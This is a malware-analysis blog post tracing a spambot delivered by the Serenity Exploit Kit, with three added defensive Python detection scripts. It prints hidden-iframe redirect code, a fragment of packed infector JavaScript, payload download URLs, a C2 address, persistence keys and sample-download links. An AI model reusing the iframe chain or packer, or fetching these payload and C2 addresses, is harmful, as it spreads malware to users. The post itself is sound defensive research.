What did the Serenity Exploit Kit drop? A Spambot Full Analysis & Samples


We ran into a bunch of landing page URLs, as hinted by our friend @abhinavbom (with thanks!).
These lead us to the infector URLs served by the Serenity Exploit Kit; an explanation of Serenity is here --->>[HERE] (thanks to @Xylit0l). We investigated the malware dropped by these URLs, as announced on our Twitter, with the result in a text report here: -->>[HERE]. The details of the investigation are in the Dropbox URL above; in this blog post we review only the important points. The infection scheme is multiple IFRAMEs opened by each front URL: flow08.php, for instance, carries about 7 (seven) iframes, each meant to redirect you to the infector, as per the hexed code below:
<iframe src="h00p://azbuka007・pro/flow1.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow2.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow3.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow4.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow5.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow6.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow7.php" width="3" height="3" frameborder="0"></iframe>
↑Each IFRAME above redirects you to the infector below↓
h00p://winampgroup.co.uk/k0ff/index.php?s=ag
This page contains obfuscated JavaScript, as per the hexed code below:

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN'
<script language='Javascript'>eval(function(p,a,c,k,e,d){e=function(c..
\10\\Q\\1e\\R\\Y\\V\\17+/\\U\',J:C(8){7 5=\'\';7 x,v,y;7 w,q,f,s;7 i=0;..
t.J(u)},M:C(e){7 l=\'\';7 i=0;7 c=0,X=0,k=0,E=0;L(i<e.h){c=e.j(i);r(c<1..
oafdhMx|stxoGt|bvvjiiwja|KbGNual|GugimE|FYBSyrEvgcI|GEWtjFCOO|||str|fun..
90170177131203221200143216237189152211217178178164170167130237226190144..
51891601972371881511781951991441822281871871992131991222012311631642372..
13023722618918116517218814817021819915922423817816819016419014418222718..
02237178131203220180140197241163168237218199159224238178168190226199181..
61751562321771901682212211981811982381882011742271981812362381771672021..
16821121718015519022918516724121719919317323518613019121617612219423818..
20168188152186163176193173171185167173225189159165239187201174217200155..
11991811931771611892112211981432022421641302412271891591972381861512292..
u0056W|u0046GHIJKLMN|224|u004fPQR|u0053TU|128|u0065fghij'.split('|'),0,..
</script></body></html>
If you decode this correctly it leads you to the 3 (three) malware file links:
winampgroup.co.uk/files/load/combo.jar
win-amps.eu/k0ff/get.php?f=6
winampgroup.co.uk/files/load/libt.php
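The landing page and the script behind it both have recognisable shapes: tiny 3x3 iframes chaining to the next stage, and an eval(function(p,a,c,k,e,d)...) packer wrapped around the exploit-kit JavaScript. Here is an added Python triage script for such pages (example code, not from the post); the HTML it scans is constructed here, with landing.example as a placeholder host.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample in the shape of the flow08.php output shown in the post;
# landing.example is a placeholder host, not one of the post's indicators.
SAMPLE_LANDING = """<html><body>
<iframe src="http://landing.example/flow1.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="http://landing.example/flow2.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="http://landing.example/flow3.php" style="display: none"></iframe>
<iframe src="http://landing.example/about.php" width="600" height="400"></iframe>
<script language='Javascript'>eval(function(p,a,c,k,e,d){e=function(c){return c};
return p}('x',62,1,'y'.split('|'),0,{}))</script>
</body></html>"""

HIDDEN_MAX_PX = 10   # an iframe this small is meant to be invisible, not viewed
# Signature of the eval(function(p,a,c,k,e,d){...}) packer seen in the infector
PACKER_RE = re.compile(
    r"eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*d\s*\)")


class LandingPageScanner(HTMLParser):
    """Collect every iframe's src/size/style and the body of every <script>."""

    def __init__(self):
        super().__init__()
        self.iframes = []          # (src, width, height, style)
        self.scripts = []          # raw script bodies
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self.iframes.append((a.get("src", ""), a.get("width"),
                                 a.get("height"), a.get("style") or ""))
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data     # script bodies may arrive in chunks


def _px(value):
    """Leading integer of a width/height attribute, or None if absent."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def is_hidden(width, height, style):
    """True for drive-by style iframes: a few pixels wide/high, or hidden by CSS."""
    w, h = _px(width), _px(height)
    if (w is not None and w <= HIDDEN_MAX_PX) or (h is not None and h <= HIDDEN_MAX_PX):
        return True
    css = style.replace(" ", "").lower()
    return "display:none" in css or "visibility:hidden" in css


def scan_landing_page(html):
    """Return the hidden iframe chain and the packed-script count for one page."""
    parser = LandingPageScanner()
    parser.feed(html)
    hidden = [src for src, w, h, style in parser.iframes if is_hidden(w, h, style)]
    hosts = {urlparse(src).hostname for src in hidden}
    return {
        "iframe_count": len(parser.iframes),
        "hidden_iframes": hidden,
        "redirect_hosts": sorted(h for h in hosts if h),
        "packed_scripts": sum(1 for s in parser.scripts if PACKER_RE.search(s)),
    }


if __name__ == "__main__":
    for key, value in scan_landing_page(SAMPLE_LANDING).items():
        print(f"{key}: {value}")
```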
When I was fetching these URLs, get.php?f=6 was the only one that I could fetch (again, see the text report in the Dropbox above for the details), which downloads a PE binary file, as per below:
$ bitcat get.php

PE Image Base : 0x400000
Entry Point: 0x1186
Compile Time: 0x50A51C6D [Thu Nov 15 16:46:37 2012 UTC]
CRC Fail! Claimed: 47607, Actual: 197000
Packer: Armadillo v2.xx (CopyMem II) - additional
Compiler: Microsoft Visual C++ 7.0 MFC
// ↑Traces...
// push 12010h
// push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
// push esi

Sections:
.text 0x1000 0x4da4 20480
.rdata 0x6000 0x16de 8192
.data 0x8000 0x1258 4096
.rsrc 0xa000 0x1f0 4096 <==== packed
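The listing above rests on a handful of PE header fields: image base, entry point, the TimeDateStamp that gives the compile time, the CheckSum that fails, and the section table. Here is an added Python triage script (example code, not from the post or from bitcat) that parses those fields and recomputes the checksum; it runs on a header-only PE32 image constructed here with the values the post reports for get.php.

```python
import struct
from datetime import datetime, timezone

COFF_LEN, OPT_PE32_LEN, SECTION_LEN = 20, 224, 40


def pe_checksum(data, checksum_field_offset):
    """Documented PE checksum: fold-carry sum of every 16-bit word, skipping the
    4-byte CheckSum field itself, plus the file length."""
    padded = data + b"\x00" if len(data) % 2 else data
    total = 0
    for off in range(0, len(padded), 2):
        if checksum_field_offset <= off < checksum_field_offset + 4:
            continue
        total += int.from_bytes(padded[off:off + 2], "little")
        total = (total & 0xFFFF) + (total >> 16)      # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    return total + len(data)


def _checksum_field_offset(data):
    """Offset of OptionalHeader.CheckSum: e_lfanew + signature + COFF header + 64."""
    return struct.unpack_from("<I", data, 0x3C)[0] + 4 + COFF_LEN + 64


def triage_pe(data):
    """Pull out what the bitcat listing shows: image base, entry point, build
    time, checksum verdict and section table. Handles PE32 (32-bit) only."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    _, nsec, stamp, _, _, opt_len, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt = pe_off + 4 + COFF_LEN
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 optional headers handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    claimed = struct.unpack_from("<I", data, opt + 64)[0]
    actual = pe_checksum(data, opt + 64)
    sections, entry_section = [], None
    for i in range(nsec):
        hdr = opt + opt_len + i * SECTION_LEN
        raw_name, vsize, va, raw = struct.unpack_from("<8sIII", data, hdr)
        name = raw_name.rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, va, vsize, raw))
        if va <= entry < va + max(vsize, raw):
            entry_section = name       # an EP outside .text is a classic packer hint
    return {
        "image_base": image_base, "entry_point": entry, "entry_section": entry_section,
        "compile_time": datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "checksum_claimed": claimed, "checksum_actual": actual, "checksum_ok": claimed == actual,
        "sections": sections,
    }


def fix_checksum(data):
    """Return a copy with the CheckSum field rewritten to the recomputed value."""
    patched = bytearray(data)
    off = _checksum_field_offset(data)
    struct.pack_into("<I", patched, off, pe_checksum(data, off))
    return bytes(patched)


def build_sample_pe():
    """Constructed header-only PE32 image. The field values mirror what the post
    reports for get.php (entry point, image base, timestamp, claimed checksum,
    section table); the bytes are built here, not taken from the sample."""
    img = bytearray(0x80)                       # DOS header + stub, zero filled
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)     # e_lfanew -> PE signature
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 4, 0x50A51C6D, 0, 0, OPT_PE32_LEN, 0x010F)
    opt = bytearray(OPT_PE32_LEN)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1186)     # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)   # ImageBase
    struct.pack_into("<I", opt, 64, 47607)      # CheckSum as claimed in the sample's header
    secs, raw_ptr = b"", 0x400
    for name, vsize, va, raw in [(b".text", 0x4DA4, 0x1000, 20480), (b".rdata", 0x16DE, 0x6000, 8192),
                                 (b".data", 0x1258, 0x8000, 4096), (b".rsrc", 0x1F0, 0xA000, 4096)]:
        secs += struct.pack("<8sIIIIIIHHI", name, vsize, va, raw, raw_ptr, 0, 0, 0, 0, 0x60000020)
        raw_ptr += raw
    return bytes(img + coff + opt + secs)
```

Running triage_pe(build_sample_pe()) reproduces the base, entry point, compile time and section table from the listing and reports the claimed checksum as failing, as bitcat did.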
We quickly checked for threat information about this file and found ourselves disappointed by the unsatisfactory result:
File get.php with MD5 268bece218187c189c2322d6f7d21efb :
DrWeb : Trojan.Spambot.11176
Symantec : WS.Reputation.1
Kaspersky : UDS:DangerousObject.Multi.Generic
So, with a bit of reversing skill, we decided to dissect this malware file ourselves, which surfaced the many malicious traces below (again, see the text report in the Dropbox above for the details).

Binary Analysis

It looks packed with Armadillo (see the comment below for this detection/judgement), and traces of a crypter are also detected in the binary. So, for better analysis, be sure to unpack it first. @Xylit0l was kind enough to provide a video of manual analysis and unpacking with OllyDbg + PUPE below (enlarge it to see the details). After reversing some of the code you will find the dangerous operations below:
push    offset PathName ; lpFilename
push 0 ; lpModuleName
call ds:GetModuleHandleA
push eax ; hModule
call ds:GetModuleFileNameA
push 1036640h ; dwBytes
push 0 ; dwFlags
:
LPSTR GetCommandLineA(void)
extrn GetCommandLineA:dword ; DATA XREF: start:loc_40128B
:
.idata:00406038 ; BOOL __stdcall
WriteFile(HANDLE hFile,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,
LPOVERLAPPED lpOverlapped)
.idata:00406038 extrn WriteFile:dword ; DATA XREF: __NMSG_WRITE+155
:
; Microsoft VisualC 2-8/net runtime
; Attributes: library function
unknown_libname_1 proc near
arg_0= dword ptr 4
push offset ModuleName ; "mscoree.dll"
call ds:GetModuleHandleA
test eax, eax
jz short loc_401380
That was enough to tell us that it writes files, executes foreign code, and shows serious Internet activity.

Behavior analysis

The next step is to test it; we did so as per the steps below. We just ran it. The sample deleted itself, saved a copy into a different location, and ran an evil SVCHOST. Let's see what this SVCHOST does by monitoring its activity; Windows Task Manager provides enough facilities for this purpose: ↑you can see the many SMTP connections made by this binary. Then what exactly do these SMTP connections do? What malicious act? To study this malware's malicious acts we captured everything with Regshot, Wireshark and a memory dump inside the test PC, and with tcpdump outside the box.

What's the malware's malicious file operation?

The malware file deletes itself and moves itself to here:
C:\Documents and Settings\rik\jjsrdpce.exe
It drops some temp files here:
C:\DOCUME~1\...\LOCALS~1\Temp\0706.bat
C:\DOCUME~1\...\LOCALS~1\Temp\3366.bat
C:\DOCUME~1\...\LOCALS~1\Temp\8160.bat
C:\DOCUME~1\...\LOCALS~1\Temp\6783.bat
C:\DOCUME~1\...\LOCALS~1\Temp\7686.bat
C:\DOCUME~1\...\LOCALS~1\Temp\1438.bat

What this binary had done in registry?

A malware autorun component is registered as per below:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\
Software\Microsoft\Windows\CurrentVersion\Run\MSConfig:
""C:\Documents and Settings\rik\jjsrdpce.exe""
A huge blob of binary data was saved in the registry at the record below (only the start is shown):
HKLM\SOFTWARE\Microsoft\DeviceControl\DevData: C3 6A 05 ..

What networking / what kind of spam activities?

The malware grabs your IP and hostname by reverse-resolving your IP's in-addr.arpa PTR record, and then queries every possible MX (and smtp./mail. A) record of every parent domain of that name:
24 256.711421 TestPC 8.8.8.8 DNS Standard query PTR 105.83.110.xxx.in-addr.arpa
25 256.850845 8.8.8.8 TestPC DNS Standard query response PTR p6e5369.sitmnt01.ap.MyDomain
429 270.887803 TestPC 8.8.8.8 DNS Standard query A smtp.p6e5369.sitmnt01.ap.MyDomain
431 270.966472 TestPC 8.8.8.8 DNS Standard query A mail.p6e5369.sitmnt01.ap.MyDomain
435 271.254438 TestPC 8.8.8.8 DNS Standard query A sitmnt01.ap.MyDomain
437 271.332410 TestPC 8.8.8.8 DNS Standard query A smtp.sitmnt01.ap.MyDomain
439 271.410546 TestPC 8.8.8.8 DNS Standard query A mail.sitmnt01.ap.MyDomain
441 271.489836 TestPC 8.8.8.8 DNS Standard query MX sitmnt01.ap.MyDomain
443 271.571450 TestPC 8.8.8.8 DNS Standard query A ap.MyDomain
451 273.886911 TestPC 8.8.8.8 DNS Standard query A smtp.ap.MyDomain
453 273.974856 TestPC 8.8.8.8 DNS Standard query A mail.ap.MyDomain
455 274.052129 TestPC 8.8.8.8 DNS Standard query MX ap.MyDomain
456 274.148586 8.8.8.8 TestPC DNS Standard query response MX 100 mailgate.MyDomain
457 274.149148 TestPC 8.8.8.8 DNS Standard query A mailgate.MyDomain
Then it looked up the MX records of microsoft.com, yahoo.com, google.com and mail.ru.
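The DNS pattern above, a PTR lookup of the bot's own address followed by smtp./mail./MX probes up every parent of the returned name and then MX lookups of the big webmail providers, is easy to spot in a DNS log. Here is an added detection routine (example code, not from the post) that runs over tshark-style lines; the log it parses is constructed here, with TestPC, corp.example and placeholder addresses standing in for the capture's values.

```python
import re
from collections import defaultdict

# Constructed tshark-style lines in the shape of the capture shown above;
# TestPC, corp.example and the addresses are placeholders, not the post's indicators.
SAMPLE_LOG = """
24 256.711421 TestPC 8.8.8.8 DNS Standard query PTR 20.0.0.10.in-addr.arpa
25 256.850845 8.8.8.8 TestPC DNS Standard query response PTR ws20.lab.corp.example
429 270.887803 TestPC 8.8.8.8 DNS Standard query A smtp.ws20.lab.corp.example
431 270.966472 TestPC 8.8.8.8 DNS Standard query A mail.ws20.lab.corp.example
435 271.254438 TestPC 8.8.8.8 DNS Standard query A lab.corp.example
437 271.332410 TestPC 8.8.8.8 DNS Standard query A smtp.lab.corp.example
439 271.410546 TestPC 8.8.8.8 DNS Standard query A mail.lab.corp.example
441 271.489836 TestPC 8.8.8.8 DNS Standard query MX lab.corp.example
443 271.571450 TestPC 8.8.8.8 DNS Standard query A corp.example
451 273.886911 TestPC 8.8.8.8 DNS Standard query A smtp.corp.example
453 273.974856 TestPC 8.8.8.8 DNS Standard query A mail.corp.example
455 274.052129 TestPC 8.8.8.8 DNS Standard query MX corp.example
456 274.148586 8.8.8.8 TestPC DNS Standard query response MX 100 mailgate.corp.example
457 274.149148 TestPC 8.8.8.8 DNS Standard query A mailgate.corp.example
460 275.010000 TestPC 8.8.8.8 DNS Standard query MX microsoft.com
462 275.120000 TestPC 8.8.8.8 DNS Standard query MX yahoo.com
464 275.230000 TestPC 8.8.8.8 DNS Standard query MX google.com
466 275.340000 TestPC 8.8.8.8 DNS Standard query MX mail.ru
470 280.000000 Desk7 8.8.8.8 DNS Standard query A www.example
"""

LINE_RE = re.compile(r"^\s*\d+\s+[\d.]+\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+DNS\s+"
                     r"Standard query(?P<resp> response)?\s+(?P<qtype>[A-Z]+)\s+(?P<rest>.+)$")
# MX targets the post saw the bot look up once it had mapped its own mail path
WEBMAIL_MX = {"microsoft.com", "yahoo.com", "google.com", "mail.ru"}
RELAY_PREFIXES = ("smtp.", "mail.")


def parent_domains(name):
    """'ws20.lab.corp.example' -> {ws20.lab.corp.example, lab.corp.example, corp.example}"""
    labels = name.strip(".").split(".")
    return {".".join(labels[i:]) for i in range(len(labels) - 1)}


def detect_relay_discovery(log_text, min_probes=3):
    """Flag hosts that reverse-resolve themselves and then probe MX/smtp/mail
    records up their own domain tree: the spambot's relay-hunting pattern."""
    reverse_names, queries = {}, defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        name = m["rest"].split()[-1]            # MX answers carry a preference first
        if m["resp"]:
            if m["qtype"] == "PTR":
                reverse_names[m["dst"]] = name  # the answer goes back to the asking host
            continue
        queries[m["src"]].append((m["qtype"], name))
    findings = []
    for host, qs in queries.items():
        rev = reverse_names.get(host)
        if rev is None:
            continue                            # no self-PTR, not this pattern
        parents = parent_domains(rev)
        probes = [(t, n) for t, n in qs
                  if (n in parents and t in ("A", "MX"))
                  or (t == "A" and any(n == p + d for p in RELAY_PREFIXES for d in parents))]
        webmail = sorted({n for t, n in qs if t == "MX" and n in WEBMAIL_MX})
        if len(probes) >= min_probes:
            findings.append({"host": host, "reverse_name": rev,
                             "relay_probes": len(probes), "webmail_mx": webmail})
    return findings


if __name__ == "__main__":
    for finding in detect_relay_discovery(SAMPLE_LOG):
        print(finding)
```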
In addition, it looked up the PTR record of 188.40.81.203 and tried to connect to "static.203.81.40.188.clients.your-server.de":
The next thing is that it established a connection to 188.40.81.203 via remote-as: Test PC←→188.40.81.203 via TCP/2053 (remote-as) ⇒ 36063 Seq=142 Ack=258 Win=16687 Len=1412.
If the connection is established, it makes you download ANOTHER malicious binary:
// Another malware payload is sent via the TCP stream that follows, in which a PE file can be seen.....
The binary also makes you communicate with 188.40.81.203 via the SMTP protocol:
// Attempt to establish an SMTP connection from 188.40.81.203 to the infected PC
422 269.987058 188.40.81.203 TestPC TCP smtp > neod1 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 00 30 23 30 40 00 80 06 e1 c3 c0 a8 07 54 da 6e .0#0@... .....T.n
0020 53 69 04 17 00 19 20 e7 9f e9 00 00 00 00 70 02 Si.... . ......p.
0030 40 00 88 4a 00 00 02 04 05 b4 01 01 04 02 @..J.... ......
The picture of the PCAP analysis (click to enlarge): you can download the PCAP data from the link provided at the bottom of this page :-) ↑If you look at all of the captured network traffic mentioned above, you'll know this malware is positively a spambot. But not only that: it tried to access your PC via TCP/1053, a remote protocol for remote control, and thus, as a bonus, it sends you additional malicious code. In practice it uses your PC as a remote spam relay: those spam emails will be relayed through your nearest mail server if one exists, or it will use other mail servers to relay the spam. Evil enough, isn't it? (Again, see the text report in the Dropbox URL above for the details.)

Malware Detection Reference Analysis

VirusTotal provides a very good baseline detection ratio for new malware, to measure the response of antivirus products against a new threat. I often use VT as a reference for timely monitoring of malware detection. At the time this sample was detected, the VT score of the malware binary was 3/44:
MD5: 268bece218187c189c2322d6f7d21efb, File size: 146.4 KB (149879 bytes), File name: unixfreaxjp-sample3, File type: Win32 EXE, Detection: 3 / 44, Analysis date: 2012-11-16 14:02:11 UTC (0 minutes ago), URL ---->>>>>>>[CLICK]
@Xylit0l uploaded the unpacked binary, which was detected with a VT score of 27 / 44:
MD5: 09a18c6e09bb880922e9ed451d6eb6a0, File size: 68.0 KB (69632 bytes), File name: Dumpedfinal_.exe, File type: Win32 EXE, Tags: peexe, Detection: 27 / 44, Analysis date: 2012-11-17 07:13:25 UTC (1 hour, 23 minutes ago), URL ---->>>>>>>>[CLICK]
↑But the detection names are so confusing; not one of them mentions the SpamBot at all↓
MicroWorld-eScan : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
McAfee : Artemis!09A18C6E09BB
K7AntiVirus : Trojan-Downloader
F-Prot : W32/Bloop.A.gen!Eldorado
Symantec : Infostealer
Norman : W32/Malware
TotalDefense : Win32/Tofsee!generic
Kaspersky : HEUR:Trojan.Win32.Generic
BitDefender : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
Sophos : Sus/Behav-169
F-Secure : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
DrWeb : Trojan.Spambot.11176
VIPRE : BehavesLike.Win32.Malware.eah (mx-v)
AntiVir : TR/Hijacker.Gen
McAfee-GW-Edition: Artemis!09A18C6E09BB
Emsisoft : Gen:Win32.ExplorerHijack.eqX@aWv8eAi (B)
ESET-NOD32 : a variant of Win32/Agent.OBA
Kingsoft : Win32.Troj.Undef.(kcloud)
Microsoft : Backdoor:Win32/Tofsee.F
AhnLab-V3 : Spyware/Win32.Generic
GData : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
Commtouch : W32/Bloop.A.gen!Eldorado
ByteHero : Virus.Win32.Heur.c
PCTools : Trojan-PSW.Generic!rem
Rising : Backdoor.Tofsee!2B2B
AVG : unknown virus Win32/DH{AAkP}
Panda : Trj/CI.A
We must learn that malware with a 27/44 detection ratio can be packed with a crypter into a different binary to get almost zero detection for infection purposes. [POINT!] I also uploaded the obfuscated exploit kit JavaScript infector to VT and, with no shock, as expected, found that the score was only 0/44:
MD5: 4396ab2186b4358e2698c1665a16298d, File size: 5.0 KB (5130 bytes), File name: sample2, File type: HTML, Detection: 0 / 44, Analysis date: 2012-11-17 07:45:09 UTC (0 minutes ago), URL ---->>>>>>>>[CLICK]
↑So this is why so many people got infected easily. If we count the infection time carefully: the binary was compiled on the 15th, and it started to be exposed on the 16th-17th. Don't you wonder how many people got infected by this malware within the 2+ (two) days it went undetected?

Resources and samples

For research and study purposes we decided to share our analysis data, as detailed below. Use this data well to analyze this malware yourself, and kindly inform us if you find other results by commenting on this blog.
The sample can be downloaded here -->>[CLICK]
The unpacked sample (thanks to @Xylit0l) can be downloaded here -->>[CLICK]
The PCAP/network traffic can be downloaded here -->>[CLICK]
The full Regshot data can be downloaded here -->>[CLICK]

Reference & studies

Anubis sandbox result (not so useful) is here -->>[CLICK]
Comodo sandbox result (not so useful) is here -->>[CLICK]
#MalwareMustDie!!!